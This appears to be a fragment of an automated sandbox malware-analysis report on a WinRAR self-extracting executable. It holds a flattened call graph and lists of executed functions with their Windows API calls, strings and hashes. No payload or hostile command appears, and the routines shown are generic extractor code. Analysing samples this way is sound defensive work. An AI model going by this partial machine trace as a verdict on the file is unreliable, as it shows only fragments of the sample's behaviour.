24843 73fbbc CatchGuardHandler 5 API calls 24842->24843 24844 73f408 24843->24844 24844->24812 24845 748a91 24844->24845 24846 748ac0 24845->24846 24847 73fbbc CatchGuardHandler 5 API calls 24846->24847 24848 748ae9 24847->24848 24848->24814 24849->24817 24850->24819 24965 730863 24851->24965 24855 73df3d 25014 73ac16 24855->25014 24857 73df46 __cftof 24858 73df59 GetCommandLineW 24857->24858 24859 73dfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24858->24859 24860 73df68 24858->24860 24861 724092 _swprintf 51 API calls 24859->24861 25018 73c5c4 24860->25018 24863 73e04d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24861->24863 25029 73b6dd LoadBitmapW 24863->25029 24866 73dfe0 25023 73dbde 24866->25023 24867 73df76 OpenFileMappingW 24869 73dfd6 CloseHandle 24867->24869 24870 73df8f MapViewOfFile 24867->24870 24869->24859 24873 73dfa0 __InternalCxxFrameHandler 24870->24873 24874 73dfcd UnmapViewOfFile 24870->24874 24878 73dbde 2 API calls 24873->24878 24874->24869 24880 73dfbc 24878->24880 24879 7390b7 8 API calls 24881 73e0aa DialogBoxParamW 24879->24881 24880->24874 24882 73e0e4 24881->24882 24883 73e0f6 Sleep 24882->24883 24884 73e0fd 24882->24884 24883->24884 24887 73e10b 24884->24887 25059 73ae2f CompareStringW SetCurrentDirectoryW __cftof _wcslen 24884->25059 24886 73e12a DeleteObject 24888 73e146 24886->24888 24889 73e13f DeleteObject 24886->24889 24887->24886 24890 73e177 24888->24890 24893 73e189 24888->24893 24889->24888 25060 73dc3b 6 API calls 24890->25060 24892 73e17d CloseHandle 24892->24893 25056 73ac7c 24893->25056 24895 73e1c3 24900 73f993 GetModuleHandleW 24895->24900 25190 747cd5 24896->25190 24899->24815 24900->24824 24901->24826 24902->24829 24903->24804 24905->24833 24918 743b07 24906->24918 24909 742a67 24909->24835 24911 742a6f 24912 742a7a 24911->24912 24932 743b43 DeleteCriticalSection 24911->24932 24912->24835 24961 74c05a 24914->24961 24917 742a7d 7 API calls 2 library calls 24917->24836 24920 743b10 24918->24920 24921 743b39 24920->24921 24922 742a63 24920->24922 24933 743d46 24920->24933 24938 743b43 DeleteCriticalSection 24921->24938 24922->24909 24924 742b8c 24922->24924 24954 743c57 24924->24954 24928 742baf 24929 742bbc 24928->24929 24960 742bbf 6 API calls ___vcrt_FlsFree 24928->24960 24929->24911 24931 742ba1 24931->24911 24932->24909 24939 743c0d 24933->24939 24936 743d7e InitializeCriticalSectionAndSpinCount 24937 743d69 24936->24937 24937->24920 24938->24922 24940 743c26 24939->24940 24943 743c4f 24939->24943 24940->24943 24946 743b72 24940->24946 24943->24936 24943->24937 24944 743c3b GetProcAddress 24944->24943 24945 743c49 24944->24945 24945->24943 24952 743b7e ___vcrt_InitializeCriticalSectionEx 24946->24952 24947 743b95 LoadLibraryExW 24949 743bb3 GetLastError 24947->24949 24950 743bfa 24947->24950 24948 743bf3 24948->24943 24948->24944 24949->24952 24950->24948 24951 743c02 FreeLibrary 24950->24951 24951->24948 24952->24947 24952->24948 24953 743bd5 LoadLibraryExW 24952->24953 24953->24950 24953->24952 24955 743c0d ___vcrt_InitializeCriticalSectionEx 5 API calls 24954->24955 24956 743c71 24955->24956 24957 743c8a TlsAlloc 24956->24957 24958 742b96 24956->24958 24958->24931 24959 743d08 6 API calls ___vcrt_InitializeCriticalSectionEx 24958->24959 24959->24928 24960->24931 24964 74c073 24961->24964 24962 73fbbc CatchGuardHandler 5 API calls 24963 73eefe 24962->24963 24963->24839 24963->24917 24964->24962 24966 73ec50 24965->24966 24967 73086d GetModuleHandleW 24966->24967 24968 7308e7 24967->24968 24969 730888 GetProcAddress 24967->24969 24970 730c14 GetModuleFileNameW 24968->24970 25070 7475fb 42 API calls __vsnwprintf_l 24968->25070 24971 7308a1 24969->24971 24972 7308b9 GetProcAddress 24969->24972 24981 730c32 24970->24981 24971->24972 24974 7308cb 24972->24974 24974->24968 24975 730b54 24975->24970 24976 730b5f GetModuleFileNameW CreateFileW 24975->24976 24977 730c08 CloseHandle 24976->24977 24978 730b8f SetFilePointer 24976->24978 24977->24970 24978->24977 24979 730b9d ReadFile 24978->24979 24979->24977 24983 730bbb 24979->24983 24984 730c94 GetFileAttributesW 24981->24984 24986 730c5d CompareStringW 24981->24986 24987 730cac 24981->24987 25061 72b146 24981->25061 25064 73081b 24981->25064 24983->24977 24985 73081b 2 API calls 24983->24985 24984->24981 24984->24987 24985->24983 24986->24981 24988 730cb7 24987->24988 24991 730cec 24987->24991 24990 730cd0 GetFileAttributesW 24988->24990 24992 730ce8 24988->24992 24989 730dfb 25013 73a64d GetCurrentDirectoryW 24989->25013 24990->24988 24990->24992 24991->24989 24993 72b146 GetVersionExW 24991->24993 24992->24991 24994 730d06 24993->24994 24995 730d73 24994->24995 24996 730d0d 24994->24996 24997 724092 _swprintf 51 API calls 24995->24997 24998 73081b 2 API calls 24996->24998 25000 730d9b AllocConsole 24997->25000 24999 730d17 24998->24999 25001 73081b 2 API calls 24999->25001 25002 730df3 ExitProcess 25000->25002 25003 730da8 GetCurrentProcessId AttachConsole 25000->25003 25004 730d21 25001->25004 25071 743e13 25003->25071 25007 72e617 53 API calls 25004->25007 25006 730dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 25006->25002 25008 730d3c 25007->25008 25009 724092 _swprintf 51 API calls 25008->25009 25010 730d4f 25009->25010 25011 72e617 53 API calls 25010->25011 25012 730d5e 25011->25012 25012->25002 25013->24855 25015 73081b 2 API calls 25014->25015 25016 73ac2a OleInitialize 25015->25016 25017 73ac4d GdiplusStartup SHGetMalloc 25016->25017 25017->24857 25019 73c5ce 25018->25019 25020 73c6e4 25019->25020 25021 731fac CharUpperW 25019->25021 25073 72f3fa 82 API calls 2 library calls 25019->25073 25020->24866 25020->24867 25021->25019 25024 73ec50 25023->25024 25025 73dbeb SetEnvironmentVariableW 25024->25025 25027 73dc0e 25025->25027 25026 73dc36 25026->24859 25027->25026 25028 73dc2a SetEnvironmentVariableW 25027->25028 25028->25026 25030 73b70b GetObjectW 25029->25030 25031 73b6fe 25029->25031 25033 73b71a 25030->25033 25074 73a6c2 FindResourceW 25031->25074 25035 73a5c6 4 API calls 25033->25035 25036 73b72d 25035->25036 25037 73b770 25036->25037 25038 73b74c 25036->25038 25039 73a6c2 12 API calls 25036->25039 25048 72da42 25037->25048 25088 73a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25038->25088 25042 73b73d 25039->25042 25041 73b754 25089 73a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25041->25089 25042->25038 25044 73b743 DeleteObject 25042->25044 25044->25038 25045 73b75d 25090 73a80c 8 API calls 25045->25090 25047 73b764 DeleteObject 25047->25037 25099 72da67 25048->25099 25053 7390b7 25054 73eb38 8 API calls 25053->25054 25055 7390d6 25054->25055 25055->24879 25057 73acab GdiplusShutdown CoUninitialize 25056->25057 25057->24895 25059->24887 25060->24892 25062 72b196 25061->25062 25063 72b15a GetVersionExW 25061->25063 25062->24981 25063->25062 25065 73ec50 25064->25065 25066 730828 GetSystemDirectoryW 25065->25066 25067 730840 25066->25067 25068 73085e 25066->25068 25069 730851 LoadLibraryW 25067->25069 25068->24981 25069->25068 25070->24975 25072 743e1b 25071->25072 25072->25006 25072->25072 25073->25019 25075 73a6e5 SizeofResource 25074->25075 25076 73a7d3 25074->25076 25075->25076 25077 73a6fc LoadResource 25075->25077 25076->25030 25076->25033 25077->25076 25078 73a711 LockResource 25077->25078 25078->25076 25079 73a722 GlobalAlloc 25078->25079 25079->25076 25080 73a73d GlobalLock 25079->25080 25081 73a7cc GlobalFree 25080->25081 25083 73a74c __InternalCxxFrameHandler 25080->25083 25081->25076 25082 73a7c5 GlobalUnlock 25082->25081 25083->25082 25091 73a626 GdipAlloc 25083->25091 25086 73a7b0 25086->25082 25087 73a79a GdipCreateHBITMAPFromBitmap 25087->25086 25088->25041 25089->25045 25090->25047 25092 73a645 25091->25092 25093 73a638 25091->25093 25092->25082 25092->25086 25092->25087 25095 73a3b9 25093->25095 25096 73a3e1 GdipCreateBitmapFromStream 25095->25096 25097 73a3da GdipCreateBitmapFromStreamICM 25095->25097 25098 73a3e6 25096->25098 25097->25098 25098->25092 25100 72da75 _wcschr __EH_prolog 25099->25100 25101 72daa4 GetModuleFileNameW 25100->25101 25102 72dad5 25100->25102 25103 72dabe 25101->25103 25145 7298e0 25102->25145 25103->25102 25105 72db31 25156 746310 25105->25156 25106 72959a 80 API calls 25107 72da4e 25106->25107 25143 72e29e GetModuleHandleW FindResourceW 25107->25143 25109 72e261 78 API calls 25111 72db05 25109->25111 25110 72db44 25112 746310 26 API calls 25110->25112 25111->25105 25111->25109 25123 72dd4a 25111->25123 25120 72db56 ___vcrt_InitializeCriticalSectionEx 25112->25120 25113 72dc85 25113->25123 25176 729d70 81 API calls 25113->25176 25115 729e80 79 API calls 25115->25120 25117 72dc9f ___std_exception_copy 25118 729bd0 82 API calls 25117->25118 25117->25123 25121 72dcc8 ___std_exception_copy 25118->25121 25120->25113 25120->25115 25120->25123 25170 729bd0 25120->25170 25175 729d70 81 API calls 25120->25175 25121->25123 25140 72dcd3 _wcslen ___std_exception_copy ___vcrt_InitializeCriticalSectionEx 25121->25140 25177 731b84 MultiByteToWideChar 25121->25177 25123->25106 25124 72e159 25129 72e1de 25124->25129 25183 748cce 26 API calls 2 library calls 25124->25183 25126 72e16e 25184 747625 26 API calls 2 library calls 25126->25184 25128 72e214 25133 746310 26 API calls 25128->25133 25129->25128 25132 72e261 78 API calls 25129->25132 25131 72e1c6 25185 72e27c 78 API calls 25131->25185 25132->25129 25135 72e22d 25133->25135 25136 746310 26 API calls 25135->25136 25136->25123 25139 731da7 WideCharToMultiByte 25139->25140 25140->25123 25140->25124 25140->25139 25178 72e5b1 50 API calls __vsnprintf 25140->25178 25179 746159 26 API calls 3 library calls 25140->25179 25180 748cce 26 API calls 2 library calls 25140->25180 25181 747625 26 API calls 2 library calls 25140->25181 25182 72e27c 78 API calls 25140->25182 25144 72da55 25143->25144 25144->25053 25146 7298ea 25145->25146 25147 72994b CreateFileW 25146->25147 25148 72996c GetLastError 25147->25148 25152 7299bb 25147->25152 25149 72bb03 GetCurrentDirectoryW 25148->25149 25150 72998c 25149->25150 25151 729990 CreateFileW GetLastError 25150->25151 25150->25152 25151->25152 25154 7299b5 25151->25154 25153 7299ff 25152->25153 25155 7299e5 SetFileTime 25152->25155 25153->25111 25154->25152 25155->25153 25157 746349 25156->25157 25158 74634d 25157->25158 25169 746375 25157->25169 25186 7491a8 20 API calls __dosmaperr 25158->25186 25160 746699 25162 73fbbc CatchGuardHandler 5 API calls 25160->25162 25161 746352 25187 749087 26 API calls __cftof 25161->25187 25164 7466a6 25162->25164 25164->25110 25165 74635d 25166 73fbbc CatchGuardHandler 5 API calls 25165->25166 25167 746369 25166->25167 25167->25110 25169->25160 25188 746230 5 API calls CatchGuardHandler 25169->25188 25171 729bdc 25170->25171 25172 729be3 25170->25172 25171->25120 25172->25171 25174 729785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 25172->25174 25189 726d1a 77 API calls 25172->25189 25174->25172 25175->25120 25176->25117 25177->25140 25178->25140 25179->25140 25180->25140 25181->25140 25182->25140 25183->25126 25184->25131 25185->25129 25186->25161 25187->25165 25188->25169 25189->25172 25191 747ce1 _abort 25190->25191 25192 747ce8 25191->25192 25193 747cfa 25191->25193 25226 747e2f GetModuleHandleW 25192->25226 25214 74ac31 EnterCriticalSection 25193->25214 25196 747ced 25196->25193 25227 747e73 GetModuleHandleExW 25196->25227 25197 747d9f 25215 747ddf 25197->25215 25200 747d01 25200->25197 25202 747d76 25200->25202 25235 7487e0 20 API calls _abort 25200->25235 25206 747d8e 25202->25206 25211 748a91 _abort 5 API calls 25202->25211 25204 747dbc 25218 747dee 25204->25218 25205 747de8 25236 752390 5 API calls CatchGuardHandler 25205->25236 25207 748a91 _abort 5 API calls 25206->25207 25207->25197 25211->25206 25214->25200 25237 74ac81 LeaveCriticalSection 25215->25237 25217 747db8 25217->25204 25217->25205 25238 74b076 25218->25238 25221 747e1c 25224 747e73 _abort 8 API calls 25221->25224 25222 747dfc GetPEB 25222->25221 25223 747e0c GetCurrentProcess TerminateProcess 25222->25223 25223->25221 25225 747e24 ExitProcess 25224->25225 25226->25196 25228 747ec0 25227->25228 25229 747e9d GetProcAddress 25227->25229 25231 747ec6 FreeLibrary 25228->25231 25232 747ecf 25228->25232 25230 747eb2 25229->25230 25230->25228 25231->25232 25233 73fbbc CatchGuardHandler 5 API calls 25232->25233 25234 747cf9 25233->25234 25234->25193 25235->25202 25237->25217 25239 74b09b 25238->25239 25243 74b091 25238->25243 25240 74ac98 __dosmaperr 5 API calls 25239->25240 25240->25243 25241 73fbbc CatchGuardHandler 5 API calls 25242 747df8 25241->25242 25242->25221 25242->25222 25243->25241 25325 73b1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 25366 731bbd GetCPInfo IsDBCSLeadByte 25297 73dca1 DialogBoxParamW 25367 73f3a0 27 API calls 25300 74a4a0 71 API calls _free 25327 73eda7 48 API calls _unexpected 25345 74a6a0 31 API calls 2 library calls 25301 7508a0 IsProcessorFeaturePresent 25368 726faa 111 API calls 3 library calls 25303 74b49d 6 API calls CatchGuardHandler 25329 739580 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 25346 73c793 102 API calls 5 library calls 25305 73c793 97 API calls 4 library calls 25331 73b18d 78 API calls

                                                                                    Executed Functions

                                                                                    Function 0073DF1E Relevance: 43.9, APIs: 17, Strings: 8, Instructions: 195filesleeptimeCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 00730863: GetModuleHandleW.KERNEL32(kernel32), ref: 0073087C
                                                                                      • Part of subcall function 00730863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0073088E
                                                                                      • Part of subcall function 00730863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 007308BF
                                                                                      • Part of subcall function 0073A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0073A655
                                                                                      • Part of subcall function 0073AC16: OleInitialize.OLE32(00000000), ref: 0073AC2F
                                                                                      • Part of subcall function 0073AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0073AC66
                                                                                      • Part of subcall function 0073AC16: SHGetMalloc.SHELL32(00768438), ref: 0073AC70
                                                                                    • GetCommandLineW.KERNEL32 ref: 0073DF5C
                                                                                    • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0073DF83
                                                                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0073DF94
                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0073DFCE
                                                                                      • Part of subcall function 0073DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0073DBF4
                                                                                      • Part of subcall function 0073DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0073DC30
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0073DFD7
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe,00000800), ref: 0073DFF2
                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxname,C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe), ref: 0073DFFE
                                                                                    • GetLocalTime.KERNEL32(?), ref: 0073E009
                                                                                    • _swprintf.LIBCMT ref: 0073E048
                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0073E05A
                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0073E061
                                                                                    • LoadIconW.USER32(00000000,00000064), ref: 0073E078
                                                                                    • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0073E0C9
                                                                                    • Sleep.KERNEL32(?), ref: 0073E0F7
                                                                                    • DeleteObject.GDI32 ref: 0073E130
                                                                                    • DeleteObject.GDI32(00050E74), ref: 0073E140
                                                                                    • CloseHandle.KERNEL32 ref: 0073E183
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\AppData\Local\Temp\RarSFX0$C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xzw
                                                                                    • API String ID: 3049964643-2185257127
                                                                                    • Opcode ID: 38b9e1b5b99c2aa10d6d58227e466c714dcb22da63b213656e4eca8409837d02
                                                                                    • Instruction ID: 3ce6a7dfe6a05c42f689bcca66617a72c1c8ef81e3049b9d98c8ab100d90662c
                                                                                    • Opcode Fuzzy Hash: 38b9e1b5b99c2aa10d6d58227e466c714dcb22da63b213656e4eca8409837d02
                                                                                    • Instruction Fuzzy Hash: 1A61F871504349AFE720AF74AC4DF6B7BACEB04781F048429F94A921E2DBBC9D44C766
                                                                                    Function 0072A69B Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1032 72a69b-72a6bf call 73ec50 1035 72a6c1-72a6ce FindFirstFileW 1032->1035 1036 72a727-72a730 FindNextFileW 1032->1036 1037 72a742-72a7ff call 730602 call 72c310 call 7315da * 3 1035->1037 1039 72a6d0-72a6e2 call 72bb03 1035->1039 1036->1037 1038 72a732-72a740 GetLastError 1036->1038 1043 72a804-72a811 1037->1043 1040 72a719-72a722 1038->1040 1047 72a6e4-72a6fc FindFirstFileW 1039->1047 1048 72a6fe-72a707 GetLastError 1039->1048 1040->1043 1047->1037 1047->1048 1050 72a717 1048->1050 1051 72a709-72a70c 1048->1051 1050->1040 1051->1050 1053 72a70e-72a711 1051->1053 1053->1050 1055 72a713-72a715 1053->1055 1055->1040
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0072A592,000000FF,?,?), ref: 0072A6C4
                                                                                      • Part of subcall function 0072BB03: _wcslen.LIBCMT ref: 0072BB27
                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0072A592,000000FF,?,?), ref: 0072A6F2
                                                                                    • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0072A592,000000FF,?,?), ref: 0072A6FE
                                                                                    • FindNextFileW.KERNEL32(?,?,?,?,?,?,0072A592,000000FF,?,?), ref: 0072A728
                                                                                    • GetLastError.KERNEL32(?,?,?,?,0072A592,000000FF,?,?), ref: 0072A734
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 42610566-0
                                                                                    • Opcode ID: 1b0a1501be424608ded7f985deeb666a314e078ae768f6b6fb4ace685d82ef4d
                                                                                    • Instruction ID: de6ccd0a550585c47d3b77673c22e88016b2180b870af1ae5651ac60ffc59e41
                                                                                    • Opcode Fuzzy Hash: 1b0a1501be424608ded7f985deeb666a314e078ae768f6b6fb4ace685d82ef4d
                                                                                    • Instruction Fuzzy Hash: B2419272500225EBCB25DF68DC88AEAF7B8FB48350F104196E56EE3240D7386E90CF94
                                                                                    Function 00747DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(00000000,?,00747DC4,00000000,0075C300,0000000C,00747F1B,00000000,00000002,00000000), ref: 00747E0F
                                                                                    • TerminateProcess.KERNEL32(00000000,?,00747DC4,00000000,0075C300,0000000C,00747F1B,00000000,00000002,00000000), ref: 00747E16
                                                                                    • ExitProcess.KERNEL32 ref: 00747E28
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                    • String ID:
                                                                                    • API String ID: 1703294689-0
                                                                                    • Opcode ID: ab95eb1e0a21fe26154e0d5de2f5e74ecfe6e776d01a8c56bc3ae22836c1c081
                                                                                    • Instruction ID: 872434054aed0b400523c31108c371dc0ef3df88f67564a4444e4fabbfc99b5d
                                                                                    • Opcode Fuzzy Hash: ab95eb1e0a21fe26154e0d5de2f5e74ecfe6e776d01a8c56bc3ae22836c1c081
                                                                                    • Instruction Fuzzy Hash: A2E04631000648EBCF066F20CD0DA8A3F6AEB00382B008594F8098B132CB7EDE52CA84
                                                                                    Function 0072848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    • Opcode ID: 7aa18e5d5fb513f584b896f1b3503c15446c87fb96b63ad97d5fc8c762c9fb7e
                                                                                    • Instruction ID: 78e3264be0b5a8df96321a11d434ea08955e716e561a5b72cec62b00196629d8
                                                                                    • Opcode Fuzzy Hash: 7aa18e5d5fb513f584b896f1b3503c15446c87fb96b63ad97d5fc8c762c9fb7e
                                                                                    • Instruction Fuzzy Hash: 0C824E70905165EEDF65CF64D885BFAB7B9BF05300F0C41B9E8499B243CB3A5A88C761
                                                                                    Function 0073B7E0 Relevance: 111.0, APIs: 48, Strings: 15, Instructions: 731windowfilesleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 0073B7E5
                                                                                      • Part of subcall function 00721316: GetDlgItem.USER32(00000000,00003021), ref: 0072135A
                                                                                      • Part of subcall function 00721316: SetWindowTextW.USER32(00000000,007535F4), ref: 00721370
                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0073B8D1
                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0073B8EF
                                                                                    • IsDialogMessageW.USER32(?,?), ref: 0073B902
                                                                                    • TranslateMessage.USER32(?), ref: 0073B910
                                                                                    • DispatchMessageW.USER32(?), ref: 0073B91A
                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0073B93D
                                                                                    • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 0073B960
                                                                                    • GetDlgItem.USER32(?,00000068), ref: 0073B983
                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0073B99E
                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,007535F4), ref: 0073B9B1
                                                                                      • Part of subcall function 0073D453: _wcschr.LIBVCRUNTIME ref: 0073D45C
                                                                                      • Part of subcall function 0073D453: _wcslen.LIBCMT ref: 0073D47D
                                                                                    • SetFocus.USER32(00000000), ref: 0073B9B8
                                                                                    • _swprintf.LIBCMT ref: 0073BA24
                                                                                      • Part of subcall function 00724092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007240A5
                                                                                      • Part of subcall function 0073D4D4: GetDlgItem.USER32(00000068,0077FCB8), ref: 0073D4E8
                                                                                      • Part of subcall function 0073D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,0073AF07,00000001,?,?,0073B7B9,0075506C,0077FCB8,0077FCB8,00001000,00000000,00000000), ref: 0073D510
                                                                                      • Part of subcall function 0073D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0073D51B
                                                                                      • Part of subcall function 0073D4D4: SendMessageW.USER32(00000000,000000C2,00000000,007535F4), ref: 0073D529
                                                                                      • Part of subcall function 0073D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0073D53F
                                                                                      • Part of subcall function 0073D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0073D559
                                                                                      • Part of subcall function 0073D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0073D59D
                                                                                      • Part of subcall function 0073D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0073D5AB
                                                                                      • Part of subcall function 0073D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0073D5BA
                                                                                      • Part of subcall function 0073D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0073D5E1
                                                                                      • Part of subcall function 0073D4D4: SendMessageW.USER32(00000000,000000C2,00000000,007543F4), ref: 0073D5F0
                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0073BA68
                                                                                    • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0073BA90
                                                                                    • GetTickCount.KERNEL32 ref: 0073BAAE
